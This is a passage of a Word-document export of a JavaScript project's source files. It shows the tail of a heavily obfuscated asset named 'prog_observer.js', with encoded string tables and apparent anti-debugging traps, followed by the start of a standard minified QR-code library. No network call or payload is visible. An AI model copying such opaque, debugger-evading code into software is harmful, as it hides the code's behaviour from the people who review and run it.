_0x588838+_0xeed5f3;},\'MELic\':_0x318af7(0xa2,\'D^n!\')+_0x318af7(0xeb,\'p$1W\')+_0x318af7(0xfc,\'B&amp;@p\')+\'ct\',\'gXGCo\':function(_0x291337,_0x5e1eba){return _0x291337(_0x5e1eba);},\'PmzLg\':function(_0x1ebb7e,_0x1c5dd7){return _0x1ebb7e(_0x1c5dd7);},\'yrXks\':function(_0x60fbf8){return _0x60fbf8();},\'DGpmG\':function(_0x499cda){return _0x499cda();},\'UnkfX\':function(_0x3a6dfb,_0x13f9b4){return _0x3a6dfb!==_0x13f9b4;},\'MjJCG\':_0x318af7(0x3f,\'5]Ve\')+\'Us\',\'pFuaP\':function(_0x4b641f,_0x2f23c1){return _0x4b641f!==_0x2f23c1;},\'dJNVI\':\'PMN\'+\'Iz\',\'ZZoCD\':function(_0x14362a,_0x1fe7da){return _0x14362a===_0x1fe7da;},\'EWVDb\':_0x318af7(0x134,\'#Ig@\')+\'Ti\'};function _0x3f124f(_0x1c5616){function _0x15555f(_0x482ceb,_0x5b69df){return _0x318af7(_0x482ceb-0x424,_0x5b69df);}const _0x176909={\'xgFrx\':function(_0x125e09,_0x499050){function _0x21aaa0(_0x2001af,_0x4930bc){return _0x3762(_0x2001af-0x329,_0x4930bc);}return _0x55c66e[_0x21aaa0(0x51b,\'H]9!\')+\'Nd\'](_0x125e09,_0x499050);},\'oRghO\':_0x55c66e[_0x15555f(0x544,\'w)9n\')+\'FS\'],\'AyikP\':_0x55c66e[_0x15555f(0x561,\'Ca[o\')+\'Nb\'],\'LXAze\':_0x55c66e[_0x15555f(0x598,\'C4YZ\')+\'HJ\'],\'pLZTu\':function(_0x1518dc,_0x210652){return _0x55c66e[\'zdT\'+\'Bz\'](_0x1518dc,_0x210652);},\'obOuP\':_0x55c66e[_0x15555f(0x50d,\')FYe\')+\'lY\'],\'cIHtq\':function(_0x5bfeea,_0x3ea5c8){function _0x25a126(_0x10d810,_0x4dfe97){return _0x15555f(_0x10d810- -0x232,_0x4dfe97);}return _0x55c66e[_0x25a126(0x35f,\'wjEi\')+\'jI\'](_0x5bfeea,_0x3ea5c8);},\'nxulb\':_0x55c66e[_0x15555f(0x41f,\'jwY6\')+\'jb\'],\'JndVw\':function(_0x1b6e4b){function _0xd3028c(_0x567841,_0x54c3c3){return _0x15555f(_0x54c3c3- -0x151,_0x567841);}return _0x55c66e[_0xd3028c(\'7Isp\',0x2fa)+\'Mb\'](_0x1b6e4b);}};if(_0x55c66e[_0x15555f(0x527,\'F4#B\')+\'Tv\'](_0x55c66e[_0x15555f(0x48f,\'0EKk\')+\'yl\'],_0x55c66e[\'PkT\'+\'yl\'])){if(_0x55c66e[\'UMW\'+\'jI\'](typeof _0x1c5616,_0x55c66e[\'IXj\'+\'rr\'])){if(_0x55c66e[\'qtC\'+\'XE\'](_0x55c66e[\'qmn\'+\'qY\'],_0x55c66e[_0x15555f(0x52e,\'7KHy\')+\'qY\'])){if(_0x3201eb){const _0x574d16=_0x465c08[\'app\'+\'ly\'](_0x1ce12f,arguments);return _0x3ab648=null,_0x574d16;}}else return function(_0x25bddc){}[_0x15555f(0x456,\'YQri\')+_0x15555f(0x52d,\'ZSvG\')+_0x15555f(0x56e,\'Uz8[\')+\'or\'](_0x55c66e[_0x15555f(0x420,\'YQri\')+\'Ff\'])[_0x15555f(0x4e5,\'keyU\')+\'ly\'](_0x55c66e[_0x15555f(0x524,\'L0[V\')+\'eo\']);}else{if(_0x55c66e[_0x15555f(0x44c,\'YQri\')+\'XE\'](_0x55c66e[_0x15555f(0x571,\'obHj\')+\'im\'],_0x55c66e[_0x15555f(0x5a3,\'j)r8\')+\'im\'])){const _0x2f5130=_0x46833b[\'app\'+\'ly\'](_0xfd4bb0,arguments);return _0x1a17e5=null,_0x2f5130;}else{if(_0x55c66e[_0x15555f(0x547,\'#Gcp\')+\'XE\'](_0x55c66e[_0x15555f(0x4e9,\'N!1Y\')+\'Nd\'](\'\',_0x55c66e[_0x15555f(0x481,\'D^n!\')+\'kZ\'](_0x1c5616,_0x1c5616))[_0x55c66e[\'pJv\'+\'Da\']],0x23e+-0xe0+-0x15d)||_0x55c66e[\'UMW\'+\'jI\'](_0x55c66e[_0x15555f(0x5ab,\'p$1W\')+\'vE\'](_0x1c5616,-0x11bd+-0x10bf+0x2290),-0x34c*0xb+0x109e+0x13a6*0x1))_0x55c66e[_0x15555f(0x497,\'ZSvG\')+\'jI\'](_0x55c66e[_0x15555f(0x56f,\'p*$n\')+\'Kl\'],_0x55c66e[\'zPa\'+\'LD\'])?_0x55c66e[_0x15555f(0x5c4,\'j)r8\')+\'pj\'](_0x4adead,\'0\'):function(){const _0x1c8619={\'RHbTu\':function(_0x1de8d2,_0xa9f96a){function _0x308348(_0x36f1ff,_0x5f3d15){return _0x3762(_0x5f3d15-0x99,_0x36f1ff);}return _0x176909[_0x308348(\'dCo]\',0x2a6)+\'rx\'](_0x1de8d2,_0xa9f96a);},\'VVNiV\':_0x176909[_0x4ebb36(\'j)r8\',0xa0)+\'hO\'],\'jmXia\':_0x176909[_0x4ebb36(\'L0[V\',0x6b)+\'kP\'],\'SuxLP\':_0x176909[_0x4ebb36(\'O^MI\',0x158)+\'ze\']};function _0x4ebb36(_0x595875,_0x452908){return _0x15555f(_0x452908- -0x3ae,_0x595875);}if(_0x176909[\'pLZ\'+\'Tu\'](_0x176909[_0x4ebb36(\'37kx\',0x13a)+\'uP\'],_0x176909[_0x4ebb36(\'D^n!\',0x20d)+\'uP\']))return!![];else(function(){return!![];}[_0x4ebb36(\'D^n!\',0x171)+_0x4ebb36(\'ajln\',0xb6)+_0x4ebb36(\'[sZX\',0xd4)+\'or\'](_0x1c8619[\'RHb\'+\'Tu\'](_0x1c8619[_0x4ebb36(\'Ej7O\',0x12a)+\'iV\'],_0x1c8619[\'jmX\'+\'ia\']))[_0x4ebb36(\'H%e]\',0x147)+\'l\'](_0x1c8619[_0x4ebb36(\'2H[!\',0x227)+\'LP\']));}[_0x15555f(0x456,\'YQri\')+_0x15555f(0x4b0,\'N!1Y\')+\'uct\'+\'or\'](_0x55c66e[_0x15555f(0x5cd,\'ajln\')+\'re\'](_0x55c66e[\'fOG\'+\'FS\'],_0x55c66e[_0x15555f(0x517,\'O^MI\')+\'Nb\']))[_0x15555f(0x537,\'p*$n\')+\'l\'](_0x55c66e[_0x15555f(0x4c3,\'w&amp;WF\')+\'HJ\']);else{if(_0x55c66e[_0x15555f(0x543,\'#Gcp\')+\'fD\'](_0x55c66e[_0x15555f(0x478,\'wjEi\')+\'lY\'],_0x55c66e[_0x15555f(0x45e,\'bhuG\')+\'kU\']))(function(){function _0x100146(_0x39c573,_0x597e54){return _0x15555f(_0x597e54- -0x215,_0x39c573);}return _0x176909[_0x100146(\'b(![\',0x3ab)+\'tq\'](_0x176909[_0x100146(\'jwY6\',0x376)+\'lb\'],_0x176909[_0x100146(\'w&amp;WF\',0x2e1)+\'lb\'])?![]:!![];}[_0x15555f(0x515,\'6^)y\')+_0x15555f(0x4db,\'ji]W\')+_0x15555f(0x46c,\'6^)y\')+\'or\'](_0x55c66e[_0x15555f(0x434,\'ajln\')+\'yi\'](_0x55c66e[_0x15555f(0x42d,\'Ca[o\')+\'FS\'],_0x55c66e[\'KxY\'+\'Nb\']))[_0x15555f(0x5ba,\'C4YZ\')+\'ly\'](_0x55c66e[_0x15555f(0x5b1,\'jwY6\')+\'ic\']));else return function(_0x3ea234){}[_0x15555f(0x545,\'7Isp\')+_0x15555f(0x59a,\'Ej7O\')+_0x15555f(0x470,\'7KHy\')+\'or\'](_0x55c66e[\'tUt\'+\'Ff\'])[\'app\'+\'ly\'](_0x55c66e[_0x15555f(0x4ef,\'B&amp;@p\')+\'eo\']);}}}_0x55c66e[_0x15555f(0x546,\'a29p\')+\'Co\'](_0x3f124f,++_0x1c5616);}else _0x176909[_0x15555f(0x495,\'L0[V\')+\'Vw\'](_0x56bc8d)&amp;&amp;(_0x176909[_0x15555f(0x48a,\'p*$n\')+\'Vw\'](_0x5c50fd),_0x5b04a6[_0x15555f(0x4ad,\'2H[!\')+\'con\'+_0x15555f(0x58c,\'wjEi\')+\'t\']());}function _0x318af7(_0x4dc348,_0x100258){return _0x5e0cb6(_0x100258,_0x4dc348-0x2b0);}try{if(_0x55c66e[_0x318af7(0x16a,\'jwY6\')+\'fX\'](_0x55c66e[\'MjJ\'+\'CG\'],_0x55c66e[_0x318af7(0xa1,\'8R(E\')+\'CG\'])){if(_0x45ce58)return _0x118eb9;else _0x55c66e[\'Pmz\'+\'Lg\'](_0x117c1a,0x73c*-0x4+0x923+0x13cd);}else{if(_0x2aab0b){if(_0x55c66e[\'pFu\'+\'aP\'](_0x55c66e[_0x318af7(0x85,\'wjEi\')+\'VI\'],_0x55c66e[_0x318af7(0xc,\'ZSvG\')+\'VI\']))_0x56014e[_0x318af7(0xf6,\'0)V6\')+_0x318af7(0x19d,\'O^MI\')+_0x318af7(0x35,\'bhuG\')+_0x318af7(0x4a,\'[sZX\')+\'ven\'+\'t\']&amp;&amp;_0xaa929c[_0x318af7(0x17d,\'ji]W\')+_0x318af7(0x6c,\'N!1Y\')+\'ssB\'+_0x318af7(0x12d,\'0EKk\')+_0x318af7(0x1ae,\'w&amp;WF\')+\'t\'](_0x55c66e[_0x318af7(0xfa,\'F4#B\')+\'ks\'](_0x1a1e09)),_0x1b4d09&amp;&amp;_0x52ff31[_0x318af7(0x179,\'jnaT\')](_0x55c66e[\'DGp\'+\'mG\'](_0x1af91f));else return _0x3f124f;}else{if(_0x55c66e[_0x318af7(0x101,\'[sZX\')+\'CD\'](_0x55c66e[_0x318af7(0x12c,\'YQri\')+\'Db\'],_0x55c66e[_0x318af7(0x34,\'Uz8[\')+\'Db\']))_0x55c66e[_0x318af7(0xf7,\'bhuG\')+\'pj\'](_0x3f124f,-0x10*0xed+-0x9cf+-0x835*-0x3);else{const _0x3a07e6=_0x1ef632?function(){function _0xc4bb00(_0x32f7e1,_0x51ec6c){return _0x318af7(_0x32f7e1- -0x183,_0x51ec6c);}if(_0x1e01b3){const _0x2d313f=_0x44e97b[_0xc4bb00(-0xfd,\'p$1W\')+\'ly\'](_0x393fa9,arguments);return _0x59339b=null,_0x2d313f;}}:function(){};return _0x2b92f5=![],_0x3a07e6;}}}}catch(_0x238b95){}}function _0x3ee4(){const _0x55659f=[\'WOqoya\',\'WOm9W4e\',\'DSotWQ4\',\'nu7cNW\',\'c8kZta\',\'n8oxhq\',\'xCoAWR8\',\'W7/cVIO\',\'s8oymW\',\'cb7cTW\',\'fSk+ta\',\'WO5UpW\',\'WPNcVIi\',\'A8k2ya\',\'lSomoG\',\'WRftDW\',\'WR/cK8oy\',\'W4n4iq\',\'WPdcS8km\',\'ySomlq\',\'nt5G\',\'emkeEG\',\'c1tdHq\',\'W6C0Aq\',\'BSoZW5O\',\'W4Tjqq\',\'wSoUbG\',\'kmoyWPC\',\'hmoHwa\',\'aCkBEG\',\'W77cOSk2\',\'W7tcVSkM\',\'WRNcGSkx\',\'WOqJrW\',\'W77cLvu\',\'fSkMxG\',\'lCoUcW\',\'W6GAW5i\',\'WOHtbNVdGmkTbSkGW79QWPpcPq\',\'W7hcT8kL\',\'krnk\',\'kfrWBvuTW7NcNrRcKWil\',\'WQHkWRm\',\'aCogWQu\',\'WQKohauwW5OwW48+\',\'WQ3cKCoA\',\'sCoZWPO\',\'E8oGiq\',\'e8oiCq\',\'W4tdMa4\',\'W4XnwW\',\'WRygW60\',\'WQmCW5i\',\'AXeU\',\'W5XnyW\',\'vwn0\',\'c8o6pG\',\'pCkyfW\',\'fqdcQW\',\'W53cSLW\',\'vCoKWPC\',\'rSoUWRy\',\'WORcIG4\',\'amoodq\',\'W7ldOaS\',\'fCkiBq\',\'W6pdHcG\',\'W57dSsu\',\'WOX+nG\',\'oajm\',\'cYhcLW\',\'W5/cSq4\',\'a8keWQq\',\'WRzBea\',\'W4VcMLu\',\'ASoLWPO\',\'CG7dLq\',\'rH55\',\'W65lWRG\',\'hCohWQ4\',\'WQmgW7q\',\'WRirW40\',\'WQ7cL8kV\',\'iSokWOW\',\'bdmSW5OAktvCy1ZcNq\',\'bwldSq\',\'dCk4WOi\',\'Fa0M\',\'xCk+W68\',\'bmkKWRW\',\'WOiiFq\',\'lmkAW50\',\'hHvn\',\'kfZdKG\',\'e8kFEa\',\'smo5WPW\',\'W5CkW78\',\'w8odpa\',\'W5hdNci\',\'pc1W\',\'vYtdVq\',\'W7hcPmkH\',\'WQfCWPO\',\'W4VdKG0\',\'kCoFWOa\',\'W4mWW7e\',\'W7xdRqa\',\'vwP5\',\'g8kCFa\',\'nfdcUW\',\'nmkyW555dNjZW54FW6W4W6xcQq\',\'yaJdOG\',\'jLxcVa\',\'zd3dOG\',\'imkYW4u\',\'eSkZAW\',\'W4hcObi\',\'WQzaWRW\',\'jNVcKW\',\'W7RcKgC\',\'aSoTWQq\',\'ASo3W4i\',\'W4pcVrG\',\'WQjymW\',\'e8kmEa\',\'nSkSyW\',\'n8k7yq\',\'W4W6zq\',\'kCoiWRq\',\'oGXU\',\'dgRdPa\',\'bw8v\',\'wmooWRu\',\'W7ZcP38\',\'WOOqW7u\',\'W5Gfua\',\'W5/cGuW\',\'W4JcL1S\',\'WRxdLuG\',\'WO3dKYRcTepcLCkRmCkM\',\'cCoMbW\',\'WPJcP20\',\'j8kola\',\'W5tdPaC\',\'W6JcSeC\',\'W7FcGuu\',\'WOb9aa\',\'zmosWQK\',\'xrFdGq\',\'WQuBW6W\',\'WPHNWQK\',\'W6aJBq\',\'WQjaWRO\',\'W6NcUeO\',\'kmk4rW\',\'amobWQy\',\'DHe8\',\'W7tdVYi\',\'Emoklq\',\'WPdcOSoe\',\'smkxBW\',\'WQBdV8oKirVcN8o3jSkIWPVdUSkl\',\'WPdcLSkq\',\'WPFcLSk7\',\'ESoMW4i\',\'WRfzfa\',\'Emo3cq\',\'W7VdOIW\',\'WPFcPmoT\',\'dCk+mq\',\'W5ZcQmkg\',\'WQVcJmoc\',\'emo3WOW\',\'imkiia\',\'sCo/WPW\',\'W5dcLu0\',\'e3Gi\',\'ySocW5S\',\'WQywwq\',\'W40+sW\',\'WQPBmG\',\'CbpdPq\',\'nKhdUq\',\'B8o9WRW\',\'DSolWRG\',\'nCkNlq\',\'W4ajtW\',\'hSoqBG\',\'W4y1mG\',\'WRuhW4a\',\'W5P4xG\',\'aCovWR4\',\'WR3cKSoK\',\'WOmIW7G\',\'jmo7pW\',\'W4GpxW\',\'t8oTWQ0\',\'EG/dPa\',\'WRJcM8oA\',\'W4ZcOfO\',\'DGWV\',\'WQL/WPm\',\'F8oBaq\',\'W50+ys7cKsi1tCkzWR/cRSki\',\'WOrlpa\',\'WOv0jG\',\'WQ3cOYm\',\'aCoRoa\',\'WR5Ioa\',\'W6dcIMS\',\'W4m/W4u\',\'WPBcIXC\',\'WOSTW5C\',\'k8kGaa\',\'AmoEpq\',\'yCoaWOm\',\'W7WXW5u\',\'gwRdNW\',\'W4LUEa\',\'WQJcG8kC\',\'F8omoG\',\'W5ZcJwW\',\'W5/cTMK\',\'d8o2eG\',\'W4XzDq\',\'kmoobq\',\'W4ZcQ24\',\'iSkDzW\',\'W5tcHNy\',\'nCkLbG\',\'W4SjzG\',\'d8o9oq\',\'W6FdLCkq\',\'W6JdSHG\',\'WRNcJSoW\',\'AmoKW6S\',\'W4NcNSk3\',\'WQ0zW5C\',\'oCoicq\',\'W43cRw4\',\'o8oQeW\',\'WR/cV8om\',\'W4xdLYS\',\'WQzjhW\',\'bSkDyq\',\'eCoXWOW\',\'qqZdSq\',\'W5RcJhy\',\'BbnV\',\'W4RcL3K\',\'z8oZW40\',\'o8k5WQO\',\'W7PlxG\',\'v8oohq\',\'BCk0Dq\',\'FmkiW64\',\'emo3WOG\',\'ymkHjq\',\'hYxcLG\',\'kmkUWOa\',\'nCocWOG\',\'oCk5WOS\',\'omkoha\',\'hSkdfa\',\'mmoLgW\',\'imkBwG\',\'zmoZW4a\',\'W5NcJ8k0\',\'ubPi\',\'yCokWOe\',\'WQFcKmoA\',\'WRlcSmkj\',\'b2Sm\',\'WQrrWRS\',\'WOHhWQy\',\'xCo5WRW\',\'e8oNjq\',\'W4FdJXy\',\'j8kPfG\',\'z8k4W6m\',\'WPDlWRO\',\'W7SZEW\',\'WQJcNmkh\',\'fSo3kq\',\'W5JcK2G\',\'Amkwu0yoWQq5qmoKdCol\',\'WR1cjG\',\'WRf/iG\',\'kCoujq\',\'WPtcMCk1\',\'WRZcNCoC\',\'x8oCaG\',\'W6pcUcy\',\'W7xcIxO\',\'WRrBWR4\',\'W6eYFa\',\'W5lcPSkJ\',\'W4RcK3q\',\'Ffiuc8kOnZZcISoHWOKma8kZ\',\'CCokWPy\',\'WRRcOCkL\',\'WPVcTmoe\',\'nmocba\',\'DZBdNG\',\'wCoFga\',\'gCoLdG\',\'W48EEq\',\'WR3cS8kv\',\'oSkVWPyhW4hdNxVcUNRcHCk3W50\',\'WOHJpq\',\'WOuSW4y\',\'uCk/W60\',\'D8obWRC\',\'ECo3W5W\',\'WPnEWRy\',\'WQjDWOa\',\'WP9Zba\',\'W6BdMYu\',\'ySkRxa\',\'WQxcGCkU\',\'prDo\',\'WQlcTau\',\'saCV\',\'WRnhWQ8\',\'W5npyG\',\'W4RcL2O\',\'exam\',\'W6tcTCk8\',\'AmoDkG\',\'efVcOa\',\'W7OnEG\',\'WRrEfq\',\'WQbAWPK\',\'a8kyiG\',\'W7O+uq\',\'A8oZW4q\',\'WOLFch/dI8kSsCkFW75iWR7cM3C\',\'W7dcTSow\',\'WOuZW4C\',\'W4NcTmk3\',\'WQ7cMmkx\',\'WQzfoa\',\'w8k8W78\',\'i0WQ\',\'d2VdIq\',\'WQfAWRO\',\'rCkOfW\',\'W5KawW\',\'Cfvp\',\'ee/dNa\',\'WRigW6S\',\'CG5R\',\'W7tcHaK\',\'xHVdVW\',\'cSoOiq\',\'WQNcNSkm\',\'CCkota\',\'yCoqW4K\',\'WR3cM8ov\',\'cmoNjq\',\'W5mMEa\',\'zaLD\',\'WRpcHmkx\',\'AGe8\',\'W7GjuG\',\'W7ddUIC\',\'ECoBpa\',\'iLVcPG\',\'W4ddKYy\',\'WRVcNmkh\',\'WPKbcG\',\'W6xdUYa\',\'rSoFoH18W4m9dhm\',\'FmoAWPy\',\'WRFcOZm\',\'WQxcTXu\',\'qmoAoHPuW6e4fKK\',\'amo7WP0\',\'cSoxAq\',\'W6ddLCkD\',\'BCompa\',\'v3zS\',\'gSkRkq\',\'b8oWbG\',\'AmoebW\',\'W6tdQXy\',\'nSopWPW\',\'WPG0Dq\',\'W6FcVWO\',\'W53cTHm\',\'tmkOW40\',\'dNVdOW\',\'bSkkEW\',\'q8o4W4O\',\'bmo2pW\',\'W5ZdMbm\',\'W6xcPwu\',\'FXJdNa\',\'vColWRG\',\'aSoXWOW\',\'WQLogG\',\'qLvP\',\'y8ovWPa\',\'kCoOWQO\',\'WPXCWRC\',\'gmkLfG\',\'rJhdHW\',\'i8kFcq\',\'WOa7W74\',\'qgD2\',\'b0RcVq\',\'WP3cOmkR\',\'W5ZcKw4\',\'n3mi\',\'WO3cT8o0\',\'BCoCWPW\',\'WRxcNSkY\',\'WQ5wWRG\',\'nmoCWR0\',\'a8oVdq\',\'sSoLaW\',\'fSoZWOu\',\'WRdcSYi\',\'cCoFWOa\',\'WQFcJa4\',\'WQCeW7i\',\'CmobWQS\',\'sZOp\',\'umkKW6G\',\'dXNcVa\',\'Bmolmq\',\'fSo3WPS\',\'WQGhW58\',\'W6hcMbG\',\'nCk7wG\',\'WOPsdh3dJSkTsCkBW7PQWQlcIxe\',\'mWFdRq\',\'WPxcV8kY\',\'BmkMW7y\',\'tSoIWPS\',\'WQ3cJXG\',\'W6SYW60\',\'emomEW\',\'pmkVWQC\',\'amkUcq\'];_0x3ee4=function(){return _0x55659f;};return _0x3ee4();}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/core/src/transport/assets/prog_observer.js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packages/core/src/transport/assets/qr.min.js ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">function QR8bitByte(t){this.mode=QRMode.MODE_8BIT_BYTE,this.data=t,this.parsedData=[];for(var e=0,r=this.data.length;e&lt;r;e++){var o=[],n=this.data.charCodeAt(e);n&gt;65536?(o[0]=240|(1835008&amp;n)&gt;&gt;&gt;18,o[1]=128|(258048&amp;n)&gt;&gt;&gt;12,o[2]=128|(4032&amp;n)&gt;&gt;&gt;6,o[3]=128|63&amp;n):n&gt;2048?(o[0]=224|(61440&amp;n)&gt;&gt;&gt;12,o[1]=128|(4032&amp;n)&gt;&gt;&gt;6,o[2]=128|63&amp;n):n&gt;128?(o[0]=192|(1984&amp;n)&gt;&gt;&gt;6,o[1]=128|63&amp;n):o[0]=n,this.parsedData.push(o)}this.parsedData=Array.prototype.concat.apply([],this.parsedData),this.parsedData.length!=this.data.length&amp;&amp;(this.parsedData.unshift(191),this.parsedData.unshift(187),this.parsedData.unshift(239))}function QRCodeModel(t,e){this.typeNumber=t,this.errorCorrectLevel=e,this.modules=null,this.moduleCount=0,this.dataCache=null,this.dataList=[]}QR8bitByte.prototype={getLength:function(t){return this.parsedData.length},write:function(t){for(var e=0,r=this.parsedData.length;e&lt;r;e++)t.put(this.parsedData[e],8)}},QRCodeModel.prototype={addData:function(t){var e=new QR8bitByte(t);this.dataList.push(e),this.dataCache=null},isDark:function(t,e){if(t&lt;0||this.moduleCount&lt;=t||e&lt;0||this.moduleCount&lt;=e)throw new Error(t+","+e);return this.modules[t][e]},getModuleCount:function(){return this.moduleCount},make:function(){this.makeImpl(!1,this.getBestMaskPattern())},makeImpl:function(t,e){this.moduleCount=4*this.typeNumber+17,this.modules=new Array(this.moduleCount);for(var r=0;r&lt;this.moduleCount;r++){this.modules[r]=new Array(this.moduleCount);for(var o=0;o&lt;this.moduleCount;o++)this.modules[r][o]=null}this.setupPositionProbePattern(0,0),this.setupPositionProbePattern(this.moduleCount-7,0),this.setupPositionProbePattern(0,this.moduleCount-7),this.setupPositionAdjustPattern(),this.setupTimingPattern(),this.setupTypeInfo(t,e),this.typeNumber&gt;=7&amp;&amp;this.setupTypeNumber(t),null==this.dataCache&amp;&amp;(this.dataCache=QRCodeModel.createData(this.typeNumber,this.errorCorrectLevel,this.dataList)),this.mapData(this.dataCache,e)},setupPositionProbePattern:function(t,e){for(var r=-1;r&lt;=7;r++)if(!(t+r&lt;=-1||this.moduleCount&lt;=t+r))for(var o=-1;o&lt;=7;o++)e+o&lt;=-1||this.moduleCount&lt;=e+o||(this.modules[t+r][e+o]=0&lt;=r&amp;&amp;r&lt;=6&amp;&amp;(0==o||6==o)||0&lt;=o&amp;&amp;o&lt;=6&amp;&amp;(0==r||6==r)||2&lt;=r&amp;&amp;r&lt;=4&amp;&amp;2&lt;=o&amp;&amp;o&lt;=4)},getBestMaskPattern:function(){for(var t=0,e=0,r=0;r&lt;8;r++){this.makeImpl(!0,r);var o=QRUtil.getLostPoint(this);(0==r||t&gt;o)&amp;&amp;(t=o,e=r)}return e},createMovieClip:function(t,e,r){var o=t.createEmptyMovieClip(e,r);this.make();for(var n=0;n&lt;this.modules.length;n++)for(var i=1*n,a=0;a&lt;this.modules[n].length;a++){var s=1*a;this.modules[n][a]&amp;&amp;(o.beginFill(0,100),o.moveTo(s,i),o.lineTo(s+1,i),o.lineTo(s+1,i+1),o.lineTo(s,i+1),o.endFill())}return o},setupTimingPattern:function(){for(var t=8;t&lt;this.moduleCount-8;t++)null==this.modules[t][6]&amp;&amp;(this.modules[t][6]=t%2==0);for(var e=8;e&lt;this.moduleCount-8;e++)null==this.modules[6][e]&amp;&amp;(this.modules[6][e]=e%2==0)},setupPositionAdjustPattern:function(){for(var t=QRUtil.getPatternPosition(this.typeNumber),e=0;e&lt;t.length;e++)for(var r=0;r&lt;t.length;r++){var o=t[e],n=t[r];if(null==this.modules[o][n])for(var i=-2;i&lt;=2;i++)for(var a=-2;a&lt;=2;a++)this.modules[o+i][n+a]=-2==i||2==i||-2==a||2==a||0==i&amp;&amp;0==a}},setupTypeNumber:function(t){for(var e=QRUtil.getBCHTypeNumber(this.typeNumber),r=0;r&lt;18;r++){var o=!t&amp;&amp;1==(e&gt;&gt;r&amp;1);this.modules[Math.floor(r/3)][r%3+this.moduleCount-8-3]=o}for(r=0;r&lt;18;r++){o=!t&amp;&amp;1==(e&gt;&gt;r&amp;1);this.modules[r%3+this.moduleCount-8-3][Math.floor(r/3)]=o}},setupTypeInfo:function(t,e){for(var r=this.errorCorrectLevel&lt;&lt;3|e,o=QRUtil.getBCHTypeInfo(r),n=0;n&lt;15;n++){var i=!t&amp;&amp;1==(o&gt;&gt;n&amp;1);n&lt;6?this.modules[n][8]=i:n&lt;8?this.modules[n+1][8]=i:this.modules[this.moduleCount-15+n][8]=i}for(n=0;n&lt;15;n++){i=!t&amp;&amp;1==(o&gt;&gt;n&amp;1);n&lt;8?this.modules[8][this.moduleCount-n-1]=i:n&lt;9?this.modules[8][15-n-1+1]=i:this.modules[8][15-n-1]=i}this.modules[this.moduleCount-8][8]=!t},mapData:function(t,e){for(var r=-1,o=this.moduleCount-1,n=7,i=0,a=this.moduleCount-1;a&gt;0;a-=2)for(6==a&amp;&amp;a--;;){for(var s=0;s&lt;2;s++)if(null==this.modules[o][a-s]){var h=!1;i&lt;t.length&amp;&amp;(h=1==(t[i]&gt;&gt;&gt;n&amp;1)),QRUtil.getMask(e,o,a-s)&amp;&amp;(h=!h),this.modules[o][a-s]=h,-1==--n&amp;&amp;(i++,n=7)}if((o+=r)&lt;0||this.moduleCount&lt;=o){o-=r,r=-r;break}}}},QRCodeModel.PAD0=236,QRCodeModel.PAD1=17,QRCodeModel.createData=function(t,e,r){for(var o=QRRSBlock.getRSBlocks(t,e),n=new QRBitBuffer,i=0;i&lt;r.length;i++){var a=r[i];n.put(a.mode,4),n.put(a.getLength(),QRUtil.getLengthInBits(a.mode,t)),a.write(n)}var s=0;for(i=0;i&lt;o.length;i++)s+=o[i].dataCount;if(n.getLengthInBits()&gt;8*s)throw new Error("code length overflow. ("+n.getLengthInBits()+"&gt;"+8*s+")");for(n.getLengthInBits()+4&lt;=8*s&amp;&amp;n.put(0,4);n.getLengthInBits()%8!=0;)n.putBit(!1);for(;!(n.getLengthInBits()&gt;=8*s||(n.put(QRCodeModel.PAD0,8),n.getLengthInBits()&gt;=8*s));)n.put(QRCodeModel.PAD1,8);return QRCodeModel.createBytes(n,o)},QRCodeModel.createBytes=function(t,e){for(var r=0,o=0,n=0,i=new Array(e.length),a=new Array(e.length),s=0;s&lt;e.length;s++){var h=e[s].dataCount,l=e[s].totalCount-h;o=Math.max(o,h),n=Math.max(n,l),i[s]=new Array(h);for(var u=0;u&lt;i[s].length;u++)i[s][u]=255&amp;t.buffer[u+r];r+=h;var g=QRUtil.getErrorCorrectPolynomial(l),d=new QRPolynomial(i[s],g.getLength()-1).mod(g);a[s]=new Array(g.getLength()-1);for(u=0;u&lt;a[s].length;u++){var f=u+d.getLength()-a[s].length;a[s][u]=f&gt;=0?d.get(f):0}}var c=0;for(u=0;u&lt;e.length;u++)c+=e[u].totalCount;var R=new Array(c),p=0;for(u=0;u&lt;o;u++)for(s=0;s&lt;e.length;s++)u&lt;i[s].length&amp;&amp;(R[p++]=i[s][u]);for(u=0;u&lt;n;u++)for(s=0;s&lt;e.length;s++)u&lt;a[s].length&amp;&amp;(R[p++]=a[s][u]);return R};for(var QRMode={MODE_NUMBER:1,MODE_ALPHA_NUM:2,MODE_8BIT_BYTE:4,MODE_KANJI:8},QRErrorCorrectLevel={L:1,M:0,Q:3,H:2},QRMaskPattern={PATTERN000:0,PATTERN001:1,PATTERN010:2,PATTERN011:3,PATTERN100:4,PATTERN101:5,PATTERN110:6,PATTERN111:7},QRUtil={PATTERN_POSITION_TABLE:[[],[6,18],[6,22],[6,26],[6,30],[6,34],[6,22,38],[6,24,42],[6,26,46],[6,28,50],[6,30,54],[6,32,58],[6,34,62],[6,26,46,66],[6,26,48,70],[6,26,50,74],[6,30,54,78],[6,30,56,82],[6,30,58,86],[6,34,62,90],[6,28,50,72,94],[6,26,50,74,98],[6,30,54,78,102],[6,28,54,80,106],[6,32,58,84,110],[6,30,58,86,114],[6,34,62,90,118],[6,26,50,74,98,122],[6,30,54,78,102,126],[6,26,52,78,104,130],[6,30,56,82,108,134],[6,34,60,86,112,138],[6,30,58,86,114,142],[6,34,62,90,118,146],[6,30,54,78,102,126,150],[6,24,50,76,102,128,154],[6,28,54,80,106,132,158],[6,32,58,84,110,136,162],[6,26,54,82,110,138,166],[6,30,58,86,114,142,170]],G15:1335,G18:7973,G15_MASK:21522,getBCHTypeInfo:function(t){for(var e=t&lt;&lt;10;QRUtil.getBCHDigit(e)-QRUtil.getBCHDigit(QRUtil.G15)&gt;=0;)e^=QRUtil.G15&lt;&lt;QRUtil.getBCHDigit(e)-QRUtil.getBCHDigit(QRUtil.G15);return(t&lt;&lt;10|e)^QRUtil.G15_MASK},getBCHTypeNumber:function(t){for(var 